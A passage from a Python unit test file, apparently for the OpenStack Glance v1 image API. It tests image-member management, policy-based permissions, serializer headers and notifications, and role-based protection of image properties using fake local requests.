_gen_uuid())\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_get_image_members(self):\n """"""\n Tests members listing for existing images\n """"""\n req = webob.Request.blank(\'/images/%s/members\' % UUID2)\n req.method = \'GET\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n memb_list = json.loads(res.body)\n num_members = len(memb_list[\'members\'])\n self.assertEquals(num_members, 0)\n\n def test_get_image_members_allowed_by_policy(self):\n rules = {""get_members"": \'@\'}\n self.set_policy_rules(rules)\n\n req = webob.Request.blank(\'/images/%s/members\' % UUID2)\n req.method = \'GET\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n memb_list = json.loads(res.body)\n num_members = len(memb_list[\'members\'])\n self.assertEquals(num_members, 0)\n\n def test_get_image_members_forbidden_by_policy(self):\n rules = {""get_members"": \'!\'}\n self.set_policy_rules(rules)\n\n req = webob.Request.blank(\'/images/%s/members\' % UUID2)\n req.method = \'GET\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code)\n\n def test_get_image_members_not_existing(self):\n """"""\n Tests proper exception is raised if attempt to get members of\n non-existing image\n """"""\n req = webob.Request.blank(\'/images/%s/members\' % _gen_uuid())\n req.method = \'GET\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 404)\n\n def test_add_member(self):\n """"""\n Tests adding image members\n """"""\n test_router_api = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router_api, is_admin=True)\n req = webob.Request.blank(\'/images/%s/members/test\' % UUID2)\n req.method = \'PUT\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 201)\n\n def test_get_member_images(self):\n """"""\n Tests image listing for members\n """"""\n req = webob.Request.blank(\'/shared-images/pattieblack\')\n req.method = \'GET\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n memb_list = json.loads(res.body)\n num_members = len(memb_list[\'shared_images\'])\n self.assertEquals(num_members, 0)\n\n def test_replace_members(self):\n """"""\n Tests replacing image members raises right exception\n """"""\n test_router_api = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router_api, is_admin=False)\n fixture = dict(member_id=\'pattieblack\')\n\n req = webob.Request.blank(\'/images/%s/members\' % UUID2)\n req.method = \'PUT\'\n req.content_type = \'application/json\'\n req.body = json.dumps(dict(image_memberships=fixture))\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 401)\n\n def test_active_image_immutable_props_for_user(self):\n """"""\n Tests user cannot update immutable props of active image\n """"""\n test_router_api = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router_api, is_admin=False)\n fixture_header_list = [{\'x-image-meta-checksum\': \'1234\'},\n {\'x-image-meta-size\': \'12345\'}]\n for fixture_header in fixture_header_list:\n req = webob.Request.blank(\'/images/%s\' % UUID2)\n req.method = \'PUT\'\n for k, v in fixture_header.iteritems():\n req = webob.Request.blank(\'/images/%s\' % UUID2)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n orig_value = res.headers[k]\n\n req = webob.Request.blank(\'/images/%s\' % UUID2)\n req.headers[k] = v\n req.method = \'PUT\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 403)\n prop = k[len(\'x-image-meta-\'):]\n self.assertNotEqual(res.body.find(""Forbidden to modify \\\'%s\\\' ""\n ""of active ""\n ""image"" % prop), -1)\n\n req = webob.Request.blank(\'/images/%s\' % UUID2)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertEquals(orig_value, res.headers[k])\n\n def test_props_of_active_image_mutable_for_admin(self):\n """"""\n Tests admin can update \'immutable\' props of active image\n """"""\n test_router_api = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router_api, is_admin=True)\n fixture_header_list = [{\'x-image-meta-checksum\': \'1234\'},\n {\'x-image-meta-size\': \'12345\'}]\n for fixture_header in fixture_header_list:\n req = webob.Request.blank(\'/images/%s\' % UUID2)\n req.method = \'PUT\'\n for k, v in fixture_header.iteritems():\n req = webob.Request.blank(\'/images/%s\' % UUID2)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n orig_value = res.headers[k]\n\n req = webob.Request.blank(\'/images/%s\' % UUID2)\n req.headers[k] = v\n req.method = \'PUT\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n req = webob.Request.blank(\'/images/%s\' % UUID2)\n req.method = \'HEAD\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n self.assertEquals(v, res.headers[k])\n\n def test_replace_members_non_existing_image(self):\n """"""\n Tests replacing image members raises right exception\n """"""\n test_router_api = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router_api, is_admin=True)\n fixture = dict(member_id=\'pattieblack\')\n req = webob.Request.blank(\'/images/%s/members\' % _gen_uuid())\n req.method = \'PUT\'\n req.content_type = \'application/json\'\n req.body = json.dumps(dict(image_memberships=fixture))\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 404)\n\n def test_replace_members_bad_request(self):\n """"""\n Tests replacing image members raises bad request if body is wrong\n """"""\n test_router_api = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router_api, is_admin=True)\n fixture = dict(member_id=\'pattieblack\')\n\n req = webob.Request.blank(\'/images/%s/members\' % UUID2)\n req.method = \'PUT\'\n req.content_type = \'application/json\'\n req.body = json.dumps(dict(image_memberships=fixture))\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 400)\n\n def test_replace_members_positive(self):\n """"""\n Tests replacing image members\n """"""\n test_router = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router, is_admin=True)\n\n fixture = [dict(member_id=\'pattieblack\', can_share=False)]\n # Replace\n req = webob.Request.blank(\'/images/%s/members\' % UUID2)\n req.method = \'PUT\'\n req.content_type = \'application/json\'\n req.body = json.dumps(dict(memberships=fixture))\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 204)\n\n def test_replace_members_forbidden_by_policy(self):\n rules = {""modify_member"": \'!\'}\n self.set_policy_rules(rules)\n self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),\n is_admin=True)\n fixture = [{\'member_id\': \'pattieblack\', \'can_share\': \'false\'}]\n\n req = webob.Request.blank(\'/images/%s/members\' % UUID1)\n req.method = \'PUT\'\n req.content_type = \'application/json\'\n req.body = json.dumps(dict(memberships=fixture))\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code)\n\n def test_replace_members_allowed_by_policy(self):\n rules = {""modify_member"": \'@\'}\n self.set_policy_rules(rules)\n self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),\n is_admin=True)\n fixture = [{\'member_id\': \'pattieblack\', \'can_share\': \'false\'}]\n\n req = webob.Request.blank(\'/images/%s/members\' % UUID1)\n req.method = \'PUT\'\n req.content_type = \'application/json\'\n req.body = json.dumps(dict(memberships=fixture))\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code)\n\n def test_add_member(self):\n """"""\n Tests adding image members raises right exception\n """"""\n test_router = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router, is_admin=False)\n req = webob.Request.blank(\'/images/%s/members/pattieblack\' % UUID2)\n req.method = \'PUT\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 401)\n\n def test_add_member_non_existing_image(self):\n """"""\n Tests adding image members raises right exception\n """"""\n test_router = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router, is_admin=True)\n test_uri = \'/images/%s/members/pattieblack\'\n req = webob.Request.blank(test_uri % _gen_uuid())\n req.method = \'PUT\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 404)\n\n def test_add_member_positive(self):\n """"""\n Tests adding image members\n """"""\n test_router = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router, is_admin=True)\n req = webob.Request.blank(\'/images/%s/members/pattieblack\' % UUID2)\n req.method = \'PUT\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 204)\n\n def test_add_member_with_body(self):\n """"""\n Tests adding image members\n """"""\n fixture = dict(can_share=True)\n test_router = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router, is_admin=True)\n req = webob.Request.blank(\'/images/%s/members/pattieblack\' % UUID2)\n req.method = \'PUT\'\n req.body = json.dumps(dict(member=fixture))\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 204)\n\n def test_add_member_forbidden_by_policy(self):\n rules = {""modify_member"": \'!\'}\n self.set_policy_rules(rules)\n self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),\n is_admin=True)\n req = webob.Request.blank(\'/images/%s/members/pattieblack\' % UUID1)\n req.method = \'PUT\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code)\n\n def test_add_member_allowed_by_policy(self):\n rules = {""modify_member"": \'@\'}\n self.set_policy_rules(rules)\n self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),\n is_admin=True)\n req = webob.Request.blank(\'/images/%s/members/pattieblack\' % UUID1)\n req.method = \'PUT\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code)\n\n def test_get_members_of_deleted_image_raises_404(self):\n """"""\n Tests members listing for deleted image raises 404.\n """"""\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n req = webob.Request.blank(\'/images/%s/members\' % UUID2)\n req.method = \'GET\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code)\n self.assertTrue(\n \'Image with identifier %s has been deleted.\' % UUID2 in res.body)\n\n def test_delete_member_of_deleted_image_raises_404(self):\n """"""\n Tests deleting members of deleted image raises 404.\n """"""\n test_router = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(test_router, is_admin=True)\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n req = webob.Request.blank(\'/images/%s/members/pattieblack\' % UUID2)\n req.method = \'DELETE\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code)\n self.assertTrue(\n \'Image with identifier %s has been deleted.\' % UUID2 in res.body)\n\n def test_update_members_of_deleted_image_raises_404(self):\n """"""\n Tests update members of deleted image raises 404.\n """"""\n test_router = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(test_router, is_admin=True)\n\n req = webob.Request.blank(\'/images/%s/members/pattieblack\' % UUID2)\n req.method = \'PUT\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 204)\n\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n fixture = [{\'member_id\': \'pattieblack\', \'can_share\': \'false\'}]\n req = webob.Request.blank(\'/images/%s/members\' % UUID2)\n req.method = \'PUT\'\n req.content_type = \'application/json\'\n req.body = json.dumps(dict(memberships=fixture))\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code)\n self.assertTrue(\n \'Image with identifier %s has been deleted.\' % UUID2 in res.body)\n\n def test_create_member_to_deleted_image_raises_404(self):\n """"""\n Tests adding members to deleted image raises 404.\n """"""\n test_router = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(test_router, is_admin=True)\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 200)\n\n req = webob.Request.blank(\'/images/%s/members/pattieblack\' % UUID2)\n req.method = \'PUT\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPNotFound.code)\n self.assertTrue(\n \'Image with identifier %s has been deleted.\' % UUID2 in res.body)\n\n def test_delete_member(self):\n """"""\n Tests deleting image members raises right exception\n """"""\n test_router = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_router, is_admin=False)\n req = webob.Request.blank(\'/images/%s/members/pattieblack\' % UUID2)\n req.method = \'DELETE\'\n\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 401)\n\n def test_delete_member_on_non_existing_image(self):\n """"""\n Tests deleting image members raises right exception\n """"""\n test_router = router.API(self.mapper)\n api = test_utils.FakeAuthMiddleware(test_router, is_admin=True)\n test_uri = \'/images/%s/members/pattieblack\'\n req = webob.Request.blank(test_uri % _gen_uuid())\n req.method = \'DELETE\'\n\n res = req.get_response(api)\n self.assertEquals(res.status_int, 404)\n\n def test_delete_non_exist_member(self):\n """"""\n Test deleting image members raises right exception\n """"""\n test_router = router.API(self.mapper)\n api = test_utils.FakeAuthMiddleware(\n test_router, is_admin=True)\n req = webob.Request.blank(\'/images/%s/members/test_user\' % UUID2)\n req.method = \'DELETE\'\n res = req.get_response(api)\n self.assertEquals(res.status_int, 404)\n\n def test_delete_image_member(self):\n test_rserver = router.API(self.mapper)\n self.api = test_utils.FakeAuthMiddleware(\n test_rserver, is_admin=True)\n\n # Add member to image:\n fixture = dict(can_share=True)\n test_uri = \'/images/%s/members/test_add_member_positive\'\n req = webob.Request.blank(test_uri % UUID2)\n req.method = \'PUT\'\n req.content_type = \'application/json\'\n req.body = json.dumps(dict(member=fixture))\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 204)\n\n # Delete member\n test_uri = \'/images/%s/members/test_add_member_positive\'\n req = webob.Request.blank(test_uri % UUID2)\n req.headers[\'X-Auth-Token\'] = \'test1:test1:\'\n req.method = \'DELETE\'\n req.content_type = \'application/json\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, 404)\n self.assertTrue(\'Forbidden\' in res.body)\n\n def test_delete_member_allowed_by_policy(self):\n rules = {""delete_member"": \'@\', ""modify_member"": \'@\'}\n self.set_policy_rules(rules)\n self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),\n is_admin=True)\n req = webob.Request.blank(\'/images/%s/members/pattieblack\' % UUID2)\n req.method = \'PUT\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code)\n\n def test_delete_member_forbidden_by_policy(self):\n rules = {""delete_member"": \'!\', ""modify_member"": \'@\'}\n self.set_policy_rules(rules)\n self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper),\n is_admin=True)\n req = webob.Request.blank(\'/images/%s/members/pattieblack\' % UUID2)\n req.method = \'PUT\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPNoContent.code)\n req.method = \'DELETE\'\n res = req.get_response(self.api)\n self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code)\n\n\nclass TestImageSerializer(base.IsolatedUnitTest):\n def setUp(self):\n """"""Establish a clean test environment""""""\n super(TestImageSerializer, self).setUp()\n self.receiving_user = \'fake_user\'\n self.receiving_tenant = 2\n self.context = glance.context.RequestContext(\n is_admin=True,\n user=self.receiving_user,\n tenant=self.receiving_tenant)\n self.serializer = images.ImageSerializer()\n\n def image_iter():\n for x in [\'chunk\', \'678911234\', \'56789\']:\n yield x\n\n self.FIXTURE = {\n \'image_iterator\': image_iter(),\n \'image_meta\': {\n \'id\': UUID2,\n \'name\': \'fake image #2\',\n \'status\': \'active\',\n \'disk_format\': \'vhd\',\n \'container_format\': \'ovf\',\n \'is_public\': True,\n \'created_at\': timeutils.utcnow(),\n \'updated_at\': timeutils.utcnow(),\n \'deleted_at\': None,\n \'deleted\': False,\n \'checksum\': \'PI:KEY\',\n \'size\': 19,\n \'owner\': _gen_uuid(),\n \'location\': ""file:///tmp/glance-tests/2"",\n \'properties\': {},\n }\n }\n\n def test_meta(self):\n exp_headers = {\'x-image-meta-id\': UUID2,\n \'x-image-meta-location\': \'file:///tmp/glance-tests/2\',\n \'ETag\': self.FIXTURE[\'image_meta\'][\'checksum\'],\n \'x-image-meta-name\': \'fake image #2\'}\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'HEAD\'\n req.remote_addr = ""127.0.0.1""\n req.context = self.context\n response = webob.Response(request=req)\n self.serializer.meta(response, self.FIXTURE)\n for key, value in exp_headers.iteritems():\n self.assertEquals(value, response.headers[key])\n\n def test_meta_utf8(self):\n # We get unicode strings from JSON, and therefore all strings in the\n # metadata will actually be unicode when handled internally. But we\n # want to output utf-8.\n FIXTURE = {\n \'image_meta\': {\n \'id\': unicode(UUID2),\n \'name\': u\'fake image #2 with utf-8 éàè\',\n \'status\': u\'active\',\n \'disk_format\': u\'vhd\',\n \'container_format\': u\'ovf\',\n \'is_public\': True,\n \'created_at\': timeutils.utcnow(),\n \'updated_at\': timeutils.utcnow(),\n \'deleted_at\': None,\n \'deleted\': False,\n \'checksum\': u\'PI:KEY\',\n \'size\': 19,\n \'owner\': unicode(_gen_uuid()),\n \'location\': u""file:///tmp/glance-tests/2"",\n \'properties\': {\n u\'prop_éé\': u\'ça marche\',\n u\'prop_çé\': u\'çé\',\n }\n }\n }\n exp_headers = {\'x-image-meta-id\': UUID2.encode(\'utf-8\'),\n \'x-image-meta-location\': \'file:///tmp/glance-tests/2\',\n \'ETag\': \'PI:KEY\',\n \'x-image-meta-size\': \'19\', # str, not int\n \'x-image-meta-name\': \'fake image #2 with utf-8 éàè\',\n \'x-image-meta-property-prop_éé\': \'ça marche\',\n \'x-image-meta-property-prop_çé\': u\'çé\'.encode(\'utf-8\')}\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'HEAD\'\n req.remote_addr = ""127.0.0.1""\n req.context = self.context\n response = webob.Response(request=req)\n self.serializer.meta(response, FIXTURE)\n self.assertNotEqual(type(FIXTURE[\'image_meta\'][\'name\']),\n type(response.headers[\'x-image-meta-name\']))\n self.assertEqual(response.headers[\'x-image-meta-name\'].decode(\'utf-8\'),\n FIXTURE[\'image_meta\'][\'name\'])\n for key, value in exp_headers.iteritems():\n self.assertEquals(value, response.headers[key])\n\n FIXTURE[\'image_meta\'][\'properties\'][u\'prop_bad\'] = \'çé\'\n self.assertRaises(UnicodeDecodeError,\n self.serializer.meta, response, FIXTURE)\n\n def test_show(self):\n exp_headers = {\'x-image-meta-id\': UUID2,\n \'x-image-meta-location\': \'file:///tmp/glance-tests/2\',\n \'ETag\': self.FIXTURE[\'image_meta\'][\'checksum\'],\n \'x-image-meta-name\': \'fake image #2\'}\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'GET\'\n req.context = self.context\n response = webob.Response(request=req)\n self.serializer.show(response, self.FIXTURE)\n for key, value in exp_headers.iteritems():\n self.assertEquals(value, response.headers[key])\n\n self.assertEqual(response.body, \'chunk67891123456789\')\n\n def test_show_notify(self):\n """"""Make sure an eventlet posthook for notify_image_sent is added.""""""\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'GET\'\n req.context = self.context\n response = webob.Response(request=req)\n response.request.environ[\'eventlet.posthooks\'] = []\n\n self.serializer.show(response, self.FIXTURE)\n\n #just make sure the app_iter is called\n for chunk in response.app_iter:\n pass\n\n self.assertNotEqual(response.request.environ[\'eventlet.posthooks\'], [])\n\n def test_image_send_notification(self):\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'GET\'\n req.remote_addr = \'127.0.0.1\'\n req.context = self.context\n\n image_meta = self.FIXTURE[\'image_meta\']\n called = {""notified"": False}\n expected_payload = {\n \'bytes_sent\': 19,\n \'image_id\': UUID2,\n \'owner_id\': image_meta[\'owner\'],\n \'receiver_tenant_id\': self.receiving_tenant,\n \'receiver_user_id\': self.receiving_user,\n \'destination_ip\': \'127.0.0.1\',\n }\n\n def fake_info(_event_type, _payload):\n self.assertEqual(_payload, expected_payload)\n called[\'notified\'] = True\n\n self.stubs.Set(self.serializer.notifier, \'info\', fake_info)\n\n glance.api.common.image_send_notification(19, 19, image_meta, req,\n self.serializer.notifier)\n\n self.assertTrue(called[\'notified\'])\n\n def test_image_send_notification_error(self):\n """"""Ensure image.send notification is sent on error.""""""\n req = webob.Request.blank(""/images/%s"" % UUID2)\n req.method = \'GET\'\n req.remote_addr = \'127.0.0.1\'\n req.context = self.context\n\n image_meta = self.FIXTURE[\'image_meta\']\n called = {""notified"": False}\n expected_payload = {\n \'bytes_sent\': 17,\n \'image_id\': UUID2,\n \'owner_id\': image_meta[\'owner\'],\n \'receiver_tenant_id\': self.receiving_tenant,\n \'receiver_user_id\': self.receiving_user,\n \'destination_ip\': \'127.0.0.1\',\n }\n\n def fake_error(_event_type, _payload):\n self.assertEqual(_payload, expected_payload)\n called[\'notified\'] = True\n\n self.stubs.Set(self.serializer.notifier, \'error\', fake_error)\n\n #expected and actually sent bytes differ\n glance.api.common.image_send_notification(17, 19, image_meta, req,\n self.serializer.notifier)\n\n self.assertTrue(called[\'notified\'])\n\n def test_redact_location(self):\n """"""Ensure location redaction does not change original metadata""""""\n image_meta = {\'size\': 3, \'id\': \'123\', \'location\': \'http://localhost\'}\n redacted_image_meta = {\'size\': 3, \'id\': \'123\'}\n copy_image_meta = copy.deepcopy(image_meta)\n tmp_image_meta = glance.api.v1.images.redact_loc(image_meta)\n\n self.assertEqual(image_meta, copy_image_meta)\n self.assertEqual(tmp_image_meta, redacted_image_meta)\n\n def test_noop_redact_location(self):\n """"""Check no-op location redaction does not change original metadata""""""\n image_meta = {\'size\': 3, \'id\': \'123\'}\n redacted_image_meta = {\'size\': 3, \'id\': \'123\'}\n copy_image_meta = copy.deepcopy(image_meta)\n tmp_image_meta = glance.api.v1.images.redact_loc(image_meta)\n\n self.assertEqual(image_meta, copy_image_meta)\n self.assertEqual(tmp_image_meta, redacted_image_meta)\n self.assertEqual(image_meta, redacted_image_meta)\n\n\nclass TestFilterValidator(base.IsolatedUnitTest):\n def test_filter_validator(self):\n self.assertFalse(glance.api.v1.filters.validate(\'size_max\', -1))\n self.assertTrue(glance.api.v1.filters.validate(\'size_max\', 1))\n self.assertTrue(glance.api.v1.filters.validate(\'protected\', \'True\'))\n self.assertTrue(glance.api.v1.filters.validate(\'protected\', \'FALSE\'))\n self.assertFalse(glance.api.v1.filters.validate(\'protected\', \'-1\'))\n\n\nclass TestAPIProtectedProps(base.IsolatedUnitTest):\n def setUp(self):\n """"""Establish a clean test environment""""""\n super(TestAPIProtectedProps, self).setUp()\n self.mapper = routes.Mapper()\n # turn on property protections\n self.set_property_protections()\n self.api = test_utils.FakeAuthMiddleware(router.API(self.mapper))\n db_api.setup_db_env()\n db_api.get_engine()\n db_models.unregister_models(db_api._ENGINE)\n db_models.register_models(db_api._ENGINE)\n\n def tearDown(self):\n """"""Clear the test environment""""""\n super(TestAPIProtectedProps, self).tearDown()\n self.destroy_fixtures()\n\n def destroy_fixtures(self):\n # Easiest to just drop the models and re-create them...\n db_models.unregister_models(db_api._ENGINE)\n db_models.register_models(db_api._ENGINE)\n\n def _create_admin_image(self, props={}):\n request = unit_test_utils.get_fake_request(path=\'/images\')\n headers = {\'x-image-meta-disk-format\': \'ami\',\n \'x-image-meta-container-format\': \'ami\',\n \'x-image-meta-name\': \'foo\',\n \'x-image-meta-size\': \'0\',\n \'x-auth-token\': \'user:tenant:admin\'}\n headers.update(props)\n for k, v in headers.iteritems():\n request.headers[k] = v\n created_image = request.get_response(self.api)\n res_body = json.loads(created_image.body)[\'image\']\n image_id = res_body[\'id\']\n return image_id\n\n def test_prop_protection_with_create_and_permitted_role(self):\n """"""\n As admin role, create and image and verify permitted role \'member\' can\n create a protected property\n """"""\n image_id = self._create_admin_image()\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:member\',\n \'x-image-meta-property-x_owner_foo\': \'bar\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n res_body = json.loads(output.body)[\'image\']\n self.assertEqual(res_body[\'properties\'][\'x_owner_foo\'], \'bar\')\n\n def test_prop_protection_with_create_and_unpermitted_role(self):\n """"""\n As admin role, create an image and verify unpermitted role\n \'fake_member\' can *not* create a protected property\n """"""\n image_id = self._create_admin_image()\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:fake_member\',\n \'x-image-meta-property-x_owner_foo\': \'bar\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n another_request.get_response(self.api)\n output = another_request.get_response(self.api)\n self.assertEquals(output.status_int, webob.exc.HTTPForbidden.code)\n self.assertIn(""Property \'%s\' is protected"" %\n ""x_owner_foo"", output.body)\n\n def test_prop_protection_with_show_and_permitted_role(self):\n """"""\n As admin role, create an image with a protected property, and verify\n permitted role \'member\' can read that protected property via HEAD\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-x_owner_foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n method=\'HEAD\', path=\'/images/%s\' % image_id)\n headers = {\'x-auth-token\': \'user:tenant:member\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n res2 = another_request.get_response(self.api)\n self.assertEqual(res2.headers[\'x-image-meta-property-x_owner_foo\'],\n \'bar\')\n\n def test_prop_protection_with_show_and_unpermitted_role(self):\n """"""\n As admin role, create an image with a protected property, and verify\n permitted role \'fake_role\' can *not* read that protected property via\n HEAD\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-x_owner_foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n method=\'HEAD\', path=\'/images/%s\' % image_id)\n headers = {\'x-auth-token\': \'user:tenant:fake_role\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEqual(output.status_int, 200)\n self.assertEqual(\'\', output.body)\n self.assertNotIn(\'x-image-meta-property-x_owner_foo\', output.headers)\n\n def test_prop_protection_with_get_and_permitted_role(self):\n """"""\n As admin role, create an image with a protected property, and verify\n permitted role \'member\' can read that protected property via GET\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-x_owner_foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n method=\'GET\', path=\'/images/%s\' % image_id)\n headers = {\'x-auth-token\': \'user:tenant:member\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n res2 = another_request.get_response(self.api)\n self.assertEqual(res2.headers[\'x-image-meta-property-x_owner_foo\'],\n \'bar\')\n\n def test_prop_protection_with_get_and_unpermitted_role(self):\n """"""\n As admin role, create an image with a protected property, and verify\n permitted role \'fake_role\' can *not* read that protected property via\n GET\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-x_owner_foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n method=\'GET\', path=\'/images/%s\' % image_id)\n headers = {\'x-auth-token\': \'user:tenant:fake_role\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEqual(output.status_int, 200)\n self.assertEqual(\'\', output.body)\n self.assertNotIn(\'x-image-meta-property-x_owner_foo\', output.headers)\n\n def test_prop_protection_with_detail_and_permitted_role(self):\n """"""\n As admin role, create an image with a protected property, and verify\n permitted role \'member\' can read that protected property via\n /images/detail\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-x_owner_foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n method=\'GET\', path=\'/images/detail\')\n headers = {\'x-auth-token\': \'user:tenant:member\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEqual(output.status_int, 200)\n res_body = json.loads(output.body)[\'images\'][0]\n self.assertEqual(res_body[\'properties\'][\'x_owner_foo\'], \'bar\')\n\n def test_prop_protection_with_detail_and_unpermitted_role(self):\n """"""\n As admin role, create an image with a protected property, and verify\n permitted role \'fake_role\' can *not* read that protected property via\n /images/detail\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-x_owner_foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n method=\'GET\', path=\'/images/detail\')\n headers = {\'x-auth-token\': \'user:tenant:fake_role\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEqual(output.status_int, 200)\n res_body = json.loads(output.body)[\'images\'][0]\n self.assertNotIn(\'x-image-meta-property-x_owner_foo\',\n res_body[\'properties\'])\n\n def test_prop_protection_with_update_and_permitted_role(self):\n """"""\n As admin role, create an image with protected property, and verify\n permitted role \'member\' can update that protected property\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-x_owner_foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:member\',\n \'x-image-meta-property-x_owner_foo\': \'baz\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n res_body = json.loads(output.body)[\'image\']\n self.assertEqual(res_body[\'properties\'][\'x_owner_foo\'], \'baz\')\n\n def test_prop_protection_with_update_and_unpermitted_role(self):\n """"""\n As admin role, create an image with protected property, and verify\n unpermitted role \'fake_role\' can *not* update that protected property\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-x_owner_foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n 